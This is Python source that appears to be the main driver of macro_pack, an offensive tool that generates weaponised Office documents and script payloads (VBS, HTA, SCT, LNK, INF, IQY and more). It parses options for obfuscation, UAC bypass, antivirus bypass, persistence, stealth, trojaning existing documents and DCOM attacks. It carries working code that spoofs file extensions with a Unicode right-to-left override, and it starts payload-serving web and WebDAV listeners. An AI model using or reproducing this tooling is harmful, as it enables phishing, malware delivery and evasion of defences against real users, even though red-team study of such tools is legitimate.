def getPayloadBuilder(self, mpSession): """ Build and return a PayloadGenerator object """ # MS Office generation/trojan is only enabled on windows payloadBuilder = None if sys.platform == "win32" and mpSession.outputFileType in MSTypes.MS_OFFICE_FORMATS: payloadBuilder = self._handleOfficeFormats(mpSession) if mpSession.outputFileType == MSTypes.VBS: payloadBuilder = VBSGenerator(mpSession) if mpSession.outputFileType == MSTypes.HTA: payloadBuilder = HTAGenerator(mpSession) if mpSession.outputFileType == MSTypes.SCT: payloadBuilder = SCTGenerator(mpSession) if mpSession.outputFileType == MSTypes.WSF: payloadBuilder = WSFGenerator(mpSession) if mpSession.outputFileType == MSTypes.XSL: payloadBuilder = XSLGenerator(mpSession) if mpSession.outputFileType == MSTypes.LNK: payloadBuilder = LNKGenerator(mpSession) if mpSession.outputFileType == MSTypes.VBA: payloadBuilder = VBAGenerator(mpSession) if mpSession.outputFileType == MSTypes.SCF: payloadBuilder = SCFGenerator(mpSession) if mpSession.outputFileType == MSTypes.URL: payloadBuilder = UrlShortcutGenerator(mpSession) if mpSession.outputFileType == MSTypes.GLK: payloadBuilder = GlkGenerator(mpSession) if mpSession.outputFileType == MSTypes.SETTINGS_MS: payloadBuilder = SettingsShortcutGenerator(mpSession) if mpSession.outputFileType == MSTypes.LIBRARY_MS: payloadBuilder = LibraryShortcutGenerator(mpSession) if mpSession.outputFileType == MSTypes.INF: payloadBuilder = InfGenerator(mpSession) if mpSession.outputFileType == MSTypes.CSPROJ: payloadBuilder = CsProjGenerator(mpSession) if mpSession.outputFileType == MSTypes.IQY: payloadBuilder = IqyGenerator(mpSession) return payloadBuilder
def main(argv): logLevel = "INFO" # initialize macro_pack session object working_directory = os.path.join(os.getcwd(), WORKING_DIR) mpSession = mp_session.MpSession(working_directory, VERSION, MP_TYPE) try: longOptions = [ "embed=", "listen=", "port=", "webdav-listen=", "generate=", "quiet", "input-file=", "encode", "obfuscate", "obfuscate-form", "obfuscate-names", "obfuscate-strings", "file=", "template=", "start-function=", "uac-bypass", "unicode-rtlo=", "dde", "print" ] shortOptions = "e:l:w:s:f:t:G:hqmop" # only for Pro release if MP_TYPE == "Pro": longOptions.extend([ "vbom-encode", "persist", "keep-alive", "av-bypass", "trojan=", "stealth", "dcom=", "background", "decoy=" ]) shortOptions += "T:b" # Only enabled on windows if sys.platform == "win32": longOptions.extend(["run="]) opts, args = getopt.getopt(argv, shortOptions, longOptions) # @UnusedVariable except getopt.GetoptError: help.printUsage(BANNER, sys.argv[0], mpSession) sys.exit(2) for opt, arg in opts: if opt in ("-o", "--obfuscate"): mpSession.obfuscateForm = True mpSession.obfuscateNames = True mpSession.obfuscateStrings = True elif opt == "--obfuscate-form": mpSession.obfuscateForm = True elif opt == "--obfuscate-names": mpSession.obfuscateNames = True elif opt == "--obfuscate-strings": mpSession.obfuscateStrings = True elif opt == "-s" or opt == "--start-function": mpSession.startFunction = arg elif opt == "-l" or opt == "--listen": mpSession.listen = True mpSession.listenRoot = os.path.abspath(arg) elif opt == "--port": mpSession.listenPort = int(arg) mpSession.WlistenPort = int(arg) elif opt == "-w" or opt == "--webdav-listen": mpSession.Wlisten = True mpSession.WRoot = os.path.abspath(arg) elif opt == "-f" or opt == "--input-file": mpSession.vbaInput = arg elif opt == "-e" or opt == "--embed": mpSession.embeddedFilePath = os.path.abspath(arg) elif opt == "-t" or opt == "--template": if arg is None or arg.startswith( "-") or arg == "help" or arg == "HELP": help.printTemplatesUsage(BANNER, sys.argv[0]) sys.exit(0) else: mpSession.template = arg elif opt == "-q" or opt == "--quiet": logLevel = "ERROR" elif opt == "-p" or opt == "--print": mpSession.printFile = True elif opt == "--dde": if sys.platform == "win32": mpSession.ddeMode = True elif opt == "--run": if sys.platform == "win32": mpSession.runTarget = os.path.abspath(arg) elif opt == "--uac-bypass": mpSession.uacBypass = True elif opt == "--unicode-rtlo": mpSession.unicodeRtlo = arg elif opt in ("-G", "--generate"): mpSession.outputFilePath = os.path.abspath(arg) elif opt == "-h" or opt == "--help": help.printUsage(BANNER, sys.argv[0], mpSession) sys.exit(0) else: if MP_TYPE == "Pro": if opt == "--vbom-encode": mpSession.vbomEncode = True elif opt == "--persist": mpSession.persist = True elif opt == "--keep-alive": mpSession.keepAlive = True elif opt == "--av-bypass": mpSession.avBypass = True elif opt == "-T" or opt == "--trojan": # Document generation enabled only on windows if sys.platform == "win32": mpSession.outputFilePath = os.path.abspath(arg) mpSession.trojan = True elif opt == "-b" or opt == "--background": mpSession.background = True elif opt == "--stealth": mpSession.stealth = True elif opt == "--dcom": mpSession.dcom = True mpSession.dcomTarget = arg elif opt == "--decoy": mpSession.decoyFilePath = os.path.abspath(arg) else: help.printUsage(BANNER, sys.argv[0], mpSession) sys.exit(0) else: #print("opt:%s, arg:%s",(opt,arg)) help.printUsage(BANNER, sys.argv[0], mpSession) sys.exit(0) if logLevel == "INFO": os.system('cls' if os.name == 'nt' else 'clear') # Logging logging.basicConfig(level=getattr(logging, logLevel), format="%(message)s", handlers=[utils.ColorLogFiler()]) logging.info(colored(BANNER, 'green')) logging.info(" [+] Preparations...") # Check output file format if mpSession.outputFilePath: logging.info(" [-] Target output format: %s" % mpSession.outputFileType) elif mpSession.listen == False and mpSession.Wlisten == False and mpSession.runTarget is None and mpSession.dcomTarget is None: logging.error(" [!] You need to provide an output file! (-G option)") sys.exit(2) # Edit outputfile name to spoof extension if unicodeRtlo option is enabled if mpSession.unicodeRtlo: logging.info(" [-] Inject %s false extension with unicode RTLO" % mpSession.unicodeRtlo) # Separate document and extension (fileName, fileExtension) = os.path.splitext(mpSession.outputFilePath) # Append unicode RTLO to file name fileName += '\u202e' # Append extension to spoof in reverse order fileName += mpSession.unicodeRtlo[::-1] # Appent file extension fileName += fileExtension mpSession.outputFilePath = fileName logging.info(" [-] File name modified to: %s" % mpSession.outputFilePath) # check input args if mpSession.vbaInput is None: # Argument not supplied, try to get file content from stdin if os.isatty(0) == False: # check if something is being piped logging.info(" [-] Waiting for piped input feed...") mpSession.stdinContent = sys.stdin.readlines() # Close Stdin pipe so we can call input() later without triggering EOF #sys.stdin.close() sys.stdin = sys.__stdin__ else: if not os.path.isfile(mpSession.vbaInput): logging.error(" [!] ERROR: Could not find %s!" % mpSession.vbaInput) sys.exit(2) else: logging.info(" [-] Input file path: %s" % mpSession.vbaInput) if mpSession.trojan == False: # verify that output file does not already exist if os.path.isfile(mpSession.outputFilePath): logging.error(" [!] ERROR: Output file %s already exist!" % mpSession.outputFilePath) sys.exit(2) else: # In trojan mode, files are tojaned if they already exist and created if they dont. # This concerns only non Office documents for now if mpSession.outputFileType not in MSTypes.MS_OFFICE_FORMATS: if os.path.isfile(mpSession.outputFilePath): logging.error( " [!] ERROR: Trojan mode not supported for %s format. \nOutput file %s already exist!" % (mpSession.outputFileType, mpSession.outputFilePath)) sys.exit(2) #Create temporary folder logging.info(" [-] Temporary working dir: %s" % working_directory) if not os.path.exists(working_directory): os.makedirs(working_directory) try: # Create temporary work file. if mpSession.ddeMode or mpSession.template or ( mpSession.outputFileType not in MSTypes.VB_FORMATS): inputFile = os.path.join(working_directory, "command.cmd") else: inputFile = os.path.join(working_directory, utils.randomAlpha(9)) + ".vba" if mpSession.stdinContent is not None: logging.info(" [-] Store std input in file...") f = open(inputFile, 'w') f.writelines(mpSession.stdinContent) f.close() else: # Create temporary work file if mpSession.vbaInput is not None: logging.info(" [-] Store input file...") shutil.copy2(mpSession.vbaInput, inputFile) if os.path.isfile(inputFile): logging.info(" [-] Temporary input file: %s" % inputFile) # Generate template if mpSession.template: if MP_TYPE == "Pro": generator = TemplateGeneratorPro(mpSession) generator.run() else: generator = TemplateToVba(mpSession) generator.run() # MS Office generation/trojan is only enabled on windows if sys.platform == "win32" and mpSession.outputFileType in MSTypes.MS_OFFICE_FORMATS: handleOfficeFormats(mpSession) # Generate Scripts if MP_TYPE == "Pro": if mpSession.outputFileType == MSTypes.VBS: generator = VBSGeneratorPro(mpSession) generator.run() if mpSession.outputFileType == MSTypes.HTA: generator = HTAGeneratorPro(mpSession) generator.run() if mpSession.outputFileType == MSTypes.SCT: generator = SCTGeneratorPro(mpSession) generator.run() if mpSession.outputFileType == MSTypes.WSF: generator = WSFGeneratorPro(mpSession) generator.run() if mpSession.outputFileType == MSTypes.XSL: generator = XSLGeneratorPro(mpSession) generator.run() else: if mpSession.outputFileType == MSTypes.VBS: generator = VBSGenerator(mpSession) generator.run() if mpSession.outputFileType == MSTypes.HTA: generator = HTAGenerator(mpSession) generator.run() if mpSession.outputFileType == MSTypes.SCT: generator = SCTGenerator(mpSession) generator.run() if mpSession.outputFileType == MSTypes.WSF: generator = WSFGenerator(mpSession) generator.run() if mpSession.outputFileType == MSTypes.XSL: generator = XSLGenerator(mpSession) generator.run() if mpSession.outputFileType == MSTypes.VBA: generator = VBAGenerator(mpSession) generator.run() if mpSession.outputFileType == MSTypes.SCF: generator = SCFGenerator(mpSession) generator.run() if mpSession.outputFileType == MSTypes.URL: generator = UrlShortcutGenerator(mpSession) generator.run() if mpSession.outputFileType == MSTypes.GLK: generator = GlkGenerator(mpSession) generator.run() if mpSession.outputFileType == MSTypes.LNK: generator = LNKGenerator(mpSession) generator.run() if mpSession.outputFileType == MSTypes.SETTINGS_MS: generator = SettingsShortcutGenerator(mpSession) generator.run() if mpSession.outputFileType == MSTypes.LIBRARY_MS: generator = LibraryShortcutGenerator(mpSession) generator.run() if mpSession.outputFileType == MSTypes.INF: generator = InfGenerator(mpSession) generator.run() if mpSession.outputFileType == MSTypes.IQY: generator = IqyGenerator(mpSession) generator.run() #run com attack if mpSession.runTarget: generator = ComGenerator(mpSession) generator.run() #run dcom attack if mpSession.dcom: generator = DcomGenerator(mpSession) generator.run() # Activate Web server if mpSession.listen: listener = ListenServer(mpSession) listener.run() if mpSession.Wlisten: Wlistener = WListenServer(mpSession) Wlistener.run() except Exception: logging.exception(" [!] Exception caught!") logging.info(" [+] Cleaning...") shutil.rmtree(working_directory) logging.info(" Done!\n") sys.exit(0)